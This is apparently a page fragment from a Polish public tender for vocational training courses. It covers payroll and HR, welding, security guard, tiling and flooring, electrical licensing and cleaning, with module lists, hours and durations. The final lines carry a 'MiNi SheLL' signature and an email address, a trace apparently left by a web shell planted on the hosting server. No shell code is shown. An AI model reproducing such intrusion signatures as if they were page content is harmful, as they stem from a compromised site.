3) rozliczenie składek ZUS - minimum 6 godzin, zawierająca  następujące jednostki szkoleniowe:
     - dokumenty zgłoszeniowe, rozliczeniowe i płatnicze 
     - zasady i tryb postępowania w sprawach rozliczenia składek 
     - wypełnianie i przekazywanie dokumentów ubezpieczeniowych 
4) zasiłki z ubezpieczenia społecznego - minimum 6 godziny, zawierająca następujące jednostki                       	szkoleniowe:
     - zasiłek chorobowy i opiekuńczy 
     - świadczenia rehabilitacyjne 
     - zasiłek macierzyński 
     - zasiłki rodzinne, pielęgnacyjne i wychowawcze 
5) kompletowanie wniosków o emerytury i renty oraz ustalenie kapitału początkowego - minimum 6 godzin, 	zawierająca  następujące jednostki szkoleniowe:
     - kapitał początkowy - jego istota i zadania 
     - wniosek ZUS do pracodawców w sprawie kapitału początkowego 
     - kompletowanie dokumentów do wniosku o ustalenie kapitału początkowego 
     - ustalenie kapitału początkowego 
3.  jednostkę modułową: zagadnienia z zakresu kadr, w tym elementy związane z prawem pracy-                        	minimum 20 godzin;
4.   jednostkę modułową: obsługa programu PŁATNIK- minimum 15 godzin;
5.   jednostkę modułową: obsługa programu SYMFONIA w zakresie kadr i płac - minimum 15 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę z zakresu                               prac biurowych oraz kadr i płac..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II. Zakres: Kurs spawania blach i rur  spoinami  pachwinowymi w metodzie MAG i TIG - 5 osób w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  5 w I edycji.
Czas realizacji: nie dłużej niż 7 tygodni.
Program szkolenia: Program szkolenia powinien obejmować minimum 240 godzin, w tym minimum 30 godzin teorii oraz minimum 210 godzin zajęć praktycznych (z zakresu spawania metodą MAG i TIG). Program szkolenia powinien zostać opracowany zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach oraz powinien uwzględniać przepisy Rozporządzenia Ministra Gospodarki z dnia 27 kwietnia 2000r. w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz. U. Nr 40 poz. 470).
Dodatkowe wymagania: Każdy uczestnik szkolenia, który ukończy szkolenie powinien otrzymać zaświadczenie zgodnie z Rozdziałem 3 pkt 3.5 SIWZ, książkę spawacza oraz świadectwo egzaminu spawacza wydane przez Instytut Spawalnictwa w Gliwicach. Egzamin zostanie zorganizowany najpóźniej w ostatnim dniu szkolenia. Wykonawca dla każdego uczestnika szkolenia zapewni odzież roboczą (ochronną) tj. minimum: obuwie, fartuch, rękawice, okulary..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> III. Zakres:Kwalifikacyjny kurs pracownika ochrony fizycznej - 5 osób w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  5 w I edycji.
Czas realizacji: nie dłużej niż 7  tygodni.
Program szkolenia:  Program szkolenia powinien obejmować minimum 245 godzin oraz musi być zgodny                    z Rozporządzeniem Ministra Spraw Wewnętrznych z dnia 18 grudnia 2013r. w sprawie wymagań w zakresie szkoleń i kursów potwierdzających przygotowanie teoretyczne i praktyczne w zakresie wyszkolenia strzeleckiego, samoobrony, technik interwencyjnych oraz znajomości przepisów prawa związanych z wykonywaniem ochrony osób i mienia (Dz.U z 2013r poz. 1688)
Dodatkowe wymagania:  Każdy uczestnik szkolenia, który ukończy szkolenie powinien otrzymać                            zaświadczenie zgodnie z Rozdziałem 3 pkt 3.5 SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> IV. Zakres: Płytkarz-glazurnik - 5 w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  5 w I edycji.
Czas realizacji: nie dłużej niż 6 tygodni.
Program szkolenia: minimalna ilość godzin- 200, w tym minimum 160 godzin zajęć praktycznych                             na  stanowisku pracy lub w innym miejscu umożliwiającym nabycie przez kursantów umiejętności praktycznych. Program szkolenia musi zawierać: 
1. modułowy program szkolenia zawodowego dla zawodu: posadzkarz/glazurnik, z zakresu: roboty posadzkarskie i glazurnicze (kod zawodu: 713201) z następującymi jednostkami modułowymi: 
1) stosowanie bezpiecznych metod pracy, zawierająca  następujące jednostki  szkoleniowe:
-podstawowe akty prawne dotyczące pracy;
-prawa i obowiązki pracownika i pracodawcy;
-zasady bhp i ppoż. przy robotach posadzkarskich;
-udzielanie pierwszej pomocy.
2) wykonywanie posadzek z płytek, zawierająca  następujące jednostki  szkoleniowe:
-stosowanie dokumentacji budowlanej;
-ogólna charakterystyka posadzek; 
-materiały, narzędzia i sprzęt do posadzek z płytek; 
-wykonanie i przygotowanie podkładu wraz z izolacją;
-wykonanie posadzek z płytek; 
-wykańczanie i konserwacja posadzki;
3) wykonywanie posadzek z tworzyw sztucznych i wykładzin tekstylnych, zawierająca  następujące jednostki  	szkoleniowe:
-wykonanie i przygotowanie podłoża wraz z izolacją;
-materiały, narzędzia i sprzęt do posadzek z wykładzin tekstylnych i z tworzyw sztucznych;
-wykonanie posadzki z tworzyw sztucznych;
-wykonanie posadzek z wykładzin tekstylnych;
-wykańczanie i konserwacja posadzek z wykładzin.
4) okładziny z płytek ceramicznych, zawierająca  następujące jednostki  szkoleniowe:
-przygotowanie podłoży;
-materiały, narzędzia i sprzęt do glazury; 
-wykonanie okładzin z płytek ceramicznych; 
-montaż elementów wykończeniowych i ozdobnych; 
-spoinowanie.
2. modułowy  program  szkolenia  zawodowego  dla  zawodu:  posadzkarz/glazurnik, z  zakresu: roboty posadzkarskie (kod zawodu: 713201 ) z następującymi jednostkami modułowymi: 
1) czytanie projektu budowlanego, zawierająca  następujące jednostki  szkoleniowe:
-czytanie projektu budowlanego;
-czytanie projektu konstrukcyjnego;
-czytanie opisu technicznego świadectw i atestów. 
2) materiały, narzędzia, sprzęt i urządzenia, zawierająca  następujące jednostki  szkoleniowe:
-bhp na placu budowy;
-bhp przy robotach posadzkarskich;
-bhp przy posługiwaniu się narzędziami i sprzętem mechanicznym; 
-mierzenie przy użyciu miarek i taśm; 
-materiały do izolacji wilgociowej i ochronnej;
-materiały do izolacji cieplnej i akustycznej; 
-materiały posadzkarskie; 
-materiały do wykończenia posadzek; 
-ręczne narzędzia do wyk. robót posadzkarskich; 
-mechaniczny sprzęt i narzędzia do wykonywania robót posadzkarskich;
-przyrządy i sprzęt pomiarowy.
3) składowanie, magazynowanie materiałów i ochrona środowiska, zawierająca  następujące jednostki	szkoleniowe:
-bhp na placu budowy 
-bhp przy robotach posadzkarskich 
-bhp przy posługiwaniu się narzędziami i sprzętem mechanicznym 
-mierzenie przy użyciu miarek i taśm 
-składowanie materiałów budowlanych 
-składowanie materiałów niebezpiecznych 
-transport materiałów budowlanych i ochrona środowiska 
-przygotowywanie zapraw sposobem ręcznym i mechanicznym 
-materiały do izolacji wilgociowej i ochronnej 
-materiały do izolacji cieplnej i akustycznej 
-materiały posadzkarskie 
-materiały pomocnicze, betony, zaprawy 
-materiały do wykończenia posadzek 
-przyrządy i sprzęt pomiarowy 
4) wykonywanie podłóg drewnianych, zawierająca  następujące jednostki  szkoleniowe:
-bhp na placu budowy 
-bhp przy robotach posadzkarskich 
-bhp przy posługiwaniu się narzędziami i sprzętem mechanicznym 
-mierzenie przy użyciu miarek i taśm 
-przygotowanie podłoży pod posadzki 
-wykonanie warstw izolacji przeciwwilg. 
-wykonanie izolacji cieplnej i przeciwdźwiękowej wraz z warstwą ochronną  
-wykonanie podkładów z materiałów drewnopochodnych 
-wykonanie posadzek z desek iglastych
-wykończenie posadzek z materiałów drzewnych 
-składowanie materiałów budowlanych 
-czytanie projektu architektonicznego 
-czytanie opisu technicznego, świadectw i atestów 
-materiały do izolacji wilgociowej i ochronnej 
-materiały do izolacji cieplnej i akustycznej 
-materiały posadzkarskie 
-materiały do wykończenia posadzek 
-ręczne narzędzia do wykonywania robót posadzkarskich 
-mechaniczny sprzęt i narzędzia do wykonywania robót posadzkarskich 
-przyrządy i sprzęt pomiarowy 
5) wykonywanie posadzek z parkietów, zawierająca  następujące jednostki  szkoleniowe:
-bhp na placu budowy 
-bhp przy robotach posadzkarskich 
-bhp przy posługiwaniu się narzędziami i sprzętem mechanicznym 
-mierzenie przy użyciu miarek i taśm 
-przygotowanie podłoży pod posadzki 
-wykonanie warstw izolacji przeciwwilg. 
-wykonanie izolacji cieplnej i przeciwdźwiękowej wraz z warstwą ochronną 
-wykonanie podkładów z zapraw i prefabrykatów 
-wykonanie podkładów z materiałów drewnopochodnych 
-wykonanie posadzek deszczółkowych, mozailowych, typu bar i klejowych 
-wykonanie posadzek z kostki drewnianej 
-wykończenie posadzek z materiałów drzewnych 
-transport materiałów budowlanych i ochrona środowiska 
-czytanie projektu architektonicznego 
-czytanie opisu technicznego, świadectw i atestów 
-materiały do izolacji wilgociowych i ochronnych 
-materiały do izolacji cieplnej i akustycznej 
-materiały posadzkarskie 
-materiały pomocnicze, betony, zaprawy 
-materiały do wykończenia posadzek 
-ręczne narzędzia do wykonywania robót posadzkarskich 
-mechaniczny sprzęt i narzędzia do wykonywania robót posadzkarskich 
-przyrządy i sprzęt pomiarowy 
6) wykonywanie posadzek z tworzyw sztucznych rolowych i płytkowych, zawierająca  następujące jednostki  	szkoleniowe:
-bhp na placu budowy 
-bhp przy robotach posadzkarskich 
-bhp przy posługiwaniu się narzędziami i sprzętem mechanicznym
-udzielanie pierwszej pomocy 
-mierzenie przy użyciu miarek i taśm 
-przygotowanie podłoży pod posadzki 
-wykonanie warstw izolacji przeciwwilg. 
-wykonanie izolacji cieplnej i przeciwdźwiękowej wraz z warstwą ochronną 
-wykonanie podkładów z zapraw i prefabrykatów 
-wykonanie posadzek z wykładzin rulonowych pcv 
-wykonanie posadzek z płytek pcv 
-wykończenie posadzek z tworzyw sztucznych 
-składowanie materiałów budowlanych 
-transport materiałów budowlanych i ochrona środowiska 
-przygotowywanie zapraw sposobem ręcznym i mechanicznym 
-czytanie projektu architektonicznego 
-czytanie projektu konstrukcyjnego 
-czytanie opisu technicznego świadectw i atestów 
-materiały do izolacji wilgociowych i ochronnych 
-materiały do izolacji cieplnej i akustycznej 
-materiały posadzkarskie 
-materiały pomocnicze, betony, zaprawy 
-materiały do wykończenia posadzek 
-ręczne narzędzia do wykonywania robót posadzkarskich 
-mechaniczny sprzęt i narzędzia do wykonywania robót posadzkarskich 
-przyrządy i sprzęt pomiarowy 
7) wykonywanie posadzek z wykładzin tekstylnych, zawierająca  następujące jednostki  szkoleniowe:
-bhp na placu budowy
-bhp przy robotach posadzkarskich 
-bhp przy posługiwaniu się narzędziami i sprzętem mechanicznym 
-udzielanie pierwszej pomocy
-mierzenie przy użyciu miarek i taśm 
-przygotowanie podłoży pod posadzki 
-wykonanie izolacji cieplnej i przeciwdźwiękowej wraz z warstwą ochronną
-wykonanie warstw izolacji przeciwwilg.
-wykonanie podkładów z zapraw i prefabrykatów 
-wykonanie posadzek z wykładzin dywanowych
-wykończenie posadzek z wykładzin dywanowych
-składowanie materiałów budowlanych
-transport materiałów budowlanych 
-przygotowywanie zapraw sposobem ręcznym i mechanicznym 
-czytanie projektu architektonicznego
-czytanie projektu konstrukcyjnego
-czytanie opisu technicznego świadectw i atestów
-materiały do izolacji wilgociowych i ochronnych
-materiały do izolacji cieplnej i akustycznej 
-materiały posadzkarskie 
-materiały pomocnicze, betony, zaprawy 
-materiały do wykończenia posadzek
-ręczne narzędzia do wykonywania robót posadzkarskich
-mechaniczny sprzęt i narzędzia do wykonywania robót posadzkarskich 
-przyrządy i sprzęt pomairowy 
8) wykonywanie posadzek bezspoinowych, żywiczno-mineralnych, zawierająca  następujące jednostki	szkoleniowe:
-bhp na placu budowy
-bhp przy robotach posadzkarskich
-bhp przy posługiwaniu się narzędziami i sprzętem mechanicznym
-udzielanie pierwszej pomocy
-mierzenie przy użyciu miarek i taśm
-przygotowanie podłoża pod posadzki
-wykonanie warstw izolacji przeciwwilg.
-wykonanie warstw izolacji cieplnej i przeciwakustycznej wraz z warstwą ochronną
-wykonanie podkładów z zapraw i prefabrykatów
-wykonanie podkładu pod posadzki bezspoinowe żywiczno-mineralne 
-wykonanie posadzek bezspoinowych żywiczno-mineralnych
-składowanie materiałów budowlanych 
-transport materiałów budowlanych i ochona środowiska
-przygotowywanie zapraw sposobem ręcznym i mechanicznym
-czytanie projektu architektonicznego
-czytanie projektu konstrukcyjnego
-czytanie opisu technicznego świadectw i atestów
-materiały do izolacji wilgociowych i ochronnych
-materiały do izolacji cieplnej i akustycznej 
-materiały pomocnicze, betony, zaprawy
-ręczne narzędzia do wykonywania robót posadzkarskich 
9) wykonywanie posadzek z płytek, zawierająca  następujące jednostki  szkoleniowe:
-bhp na placu budowy 
-bhp przy robotach posadzkarskich
-bhp przy posługiwaniu się narzędziami i sprzętem mechanicznym
-udzielanie pierwszej pomocy
-mierzenie przy użyciu miarek i taśm 
-przygotowanie podłoży pod posadzki
-wykonanie warstw izolacji przeciwwilg.
-wykonanie izolacji cieplnej i przeciwakustycznej wraz z warstwą ochronną 
-wykonanie podkładów z zapraw i prefabrykatów
-wykonanie posadzek z płytek
-wykończenie posadzek z płytek
-składowanie materiałów budowlanych
-transport materiałów budowlanych i ochona środowiska
-przygotowywanie zapraw sposobem ręcznym i mechanicznym
-czytanie projektu architektonicznego 
-czytanie projektu konstrukcyjnego
-czytanie opisu technicznego świadectw i atestów
-materiały do izolacji wilgociowych i ochronnych
-materiały do izolacji cieplnej i akustycznej
-materiały posadzkarskie
-materiały pomocnicze, betony zaprawy
-materiały do wykończenia posadzek
-ręczne narzędzia do wykonywania robót posadzkarskich
-mechaniczny sprzęt i narzędzia do wykonywania robót posadzkarskich
-przyrządy i sprzet pomiarowy
10) wykonywanie posadzek cementowych wylewanych na mokro, zawierająca  następujące jednostki		szkoleniowe:
-bhp na placu budowy
-bhp przy robotach posadzkarskich 
-bhp przy posługiwaniu się narzędziami i sprzętem mechanicznym
-udzielanie pierwszej pomocy
-mierzenie przy użyciu miarek i taśm 
-przygotowanie podłoży pod posadzki
-wykonanie warstw izolacji przeciwwilgociowych 
-wykonanie warstw izolacji cieplnej i przeciwdźwiekowej wraz z warstwą ochronną 
-wykonanie podkładów z zapraw i prefabrykatów
-wykonanie posadzek cementowych, wylewanych na mokro
-wykończenie posadzek cementowych, wylewanych na mokro 
-składowanie materiałów budowlanych
-transport materiałów budowlanych i ochona środowiska
-przygotowywanie zapraw sposobem ręcznym i mechanicznym
-czytanie projektu architektonicznego
-czytanie projektu konstrukcyjnego
-czytanie opisu technicznego świadectw i atestów
-materiały do izolacji wilgociowych i ochronnych 
-materiały do izolacji cieplnej i akustycznej
-materiały pomocnicze, betony, zaprawy 
-materiały do wykończenia posadzek
-ręczne narzędzia do wykonywania robót posadzkarskich
-mechaniczny sprzęt i narzędzia do wykonywania robót posadzkarskich
-przyrządy i sprzet pomiarowy 
11) wyklonywanie posadzek lastrykowych, zawierająca  następujące jednostki  szkoleniowe:
-prawa i obowiązki pracownika 
-bhp na placu budowy
-bhp przy robotach posadzkarskich 
-bhp przy posługiwaniu się narzędziami i sprzętem mechanicznym
-mierzenie przy użyciu miarek i taśm oraz przyrządów pomiarowych
-przygotowanie podłoży pod posadzki
-wykonanie warstw izolacji przeciwwilgociowych 
-wykonanie warstw izolacji cieplnej i przeciwdźwiekowej wraz z warstwą ochronną
-wykonanie posadzek lastrykowych
-wykończenie posadzek lastrykowych
-transport materiałów budowlanych i ochona środowiska
-przygotowywanie zapraw sposobem ręcznym i mechanicznym 
-czytanie projektu architektonicznego
-czytanie opisu technicznego świadectw i atestów
-czytanie projektu konstrukcyjnego
-materiały do izolacji wilgociowych i ochronnych 
-materiały do izolacji cieplnej i akustycznej
-materiały posadzkarskie 
-materiały pomocnicze, betony, zaprawy
-materiały do wykończenia posadzek
-ręczne narzędzia do wykonywania robót posadzkarskich
-mechaniczny sprzęt i narzędzia do wykonywania robót posadzkarskich
-przyrządy i sprzet pomiarowy 
12)wykonywanie posadzek ceglanych, zawierająca  następujące jednostki  szkoleniowe:
-prawa i obowiązki pracownika 
-bhp na placu budowy
-bhp przy robotach posadzkarskich
-bhp przy posługiwaniu się narzędziami i sprzętem mechanicznym
-przygotowanie podłoży pod posadzki
-wykonanie warstw izolacji przeciwwilgociowych
-wykonanie podkłądów z zapraw i prefabrykatów
-wykonanie posadzek ceglanych zwykłych 
-wykonanie posadzek ceglanych chemoodpornych
-transport materiałów budowlanych i ochona środowiska 
-przygotowywanie zapraw sposobem ręcznym i mechanicznym
-czytanie projektu architektonicznego
-czytanie projektu konstrukcyjnego
-czytanie opisu technicznego świadectw i atestów
-materiały do izolacji wilgociowych i ochronnych 
-materiały posadzkarskie 
-materiały pomocnicze, betony, zaprawy 
-materiały do wykończenia posadzek 
-ręczne narzędzia do wykonywania robót posadzkarskich 
Dodatkowe wymagania: Wykonawca zapewni dla każdego uczestnika szkolenia materiały budowlane                              i wykończeniowe, sprzęt niezbędny do odbycia wszystkich zajęć praktycznych oraz odzież roboczą (ochronną)                tj.  minimum  spodnie, koszula robocza, rękawice ochronne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> V. Zakres: Uprawnienia SEP do 1 kV  - 5 osób w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  5 w I edycji.
Czas realizacji: nie dłużej niż 2 tygodnie.
Program szkolenia: minimalna ilość godzin- 60. Program szkolenia musi być zgodny z przepisami                           Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. w sprawie                  szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń,                instalacji i sieci (Dz. U. Nr 89, poz. 828 z późn. zm.) i obwieszczenia Prezesa Rady Ministrów z dnia 02 lipca 2003r. o sprostowaniu błędów (Dz. U. Nr 129, poz. 1184) oraz rozporządzenia Ministra Gospodarki i Pracy z dnia 20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych zasad stwierdzania posiadania                  kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji i sieci ( Dz. U. Nr 141, poz. 1189) oraz                  zawierać m.in.:
1) zasady budowy, działania oraz warunków technicznych obsługi urządzeń, instalacji i sieci,
2) zasady eksploatacji oraz instrukcji eksploatacji urządzeń, instalacji i sieci,
3) zasady i warunki wykonywania prac kontrolno - pomiarowych i montażowych,
4) zasady i wymagania bezpieczeństwa pracy i ochrony przeciwpożarowej oraz umiejętności udzielania 	pierwszej pomocy,
5) instrukcję postępowania w razie awarii, pożaru lub innego zagrożenia bezpieczeństwa obsługi urządzeń 	lub zagrożenia życia, zdrowia i środowiska.
Dodatkowe wymagania: Szkolenie powinno zakończyć się egzaminem zewnętrznym przed Komisją powołaną przez Urząd Regulacji Energetyki. Każdy uczestnik szkolenia, który ukończy szkolenie powinien otrzymać                 zaświadczenie zgodnie z Rozdziałem 3 pkt 3.5 SIWZ oraz świadectwo kwalifikacyjne w grupie materiałowej G-1E zgodnie z wzorem świadectwa kwalifikacyjnego, stanowiącym załącznik do rozporządzenia Ministra Gospodarki              i Pracy z dnia  20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych zasad stwierdzania                posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji i sieci (Dz. U. Nr 141 poz. 1189). Egzamin zostanie zorganizowany najpóźniej w ostatnim dniu szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> VI. Zakres: Obsługa urządzeń sprzątających - 5 osób w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób: 5 w I edycji.
Czas realizacji: nie dłużej niż 2 tygodnie
Program szkolenia:  minimalna ilość godzin - 60, w tym minimum 50 godzin zajęć praktycznych na stanowisku pracy lub w innym miejscu umożliwiającym nabycie przez kursantów umiejętności praktycznych.
Program szkolenia musi zawierać następujące jednostki modułowe:
1) zasady bezpieczeństwa i higieny pracy w sferze prac porządkowych i utrzymania czystości;
2) rodzaje obiektów i zasady sprzątania wg nowoczesnych systemów utrzymania czystości, w tym		pomieszczeń biurowych, hotelowych, placówek gastronomicznych, obiektów handlowych i przemysłowych, 		toalet, korytarzy, wind, domów prywatnych;
3) środki chemiczne i dezynfekcyjne wykorzystywane w wykonywaniu usług sprzątających;
4) techniki sprzątania;
5) zasady organizacji służb sprzątających;
6) zasady utrzymywania czystości na zewnątrz obiektów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com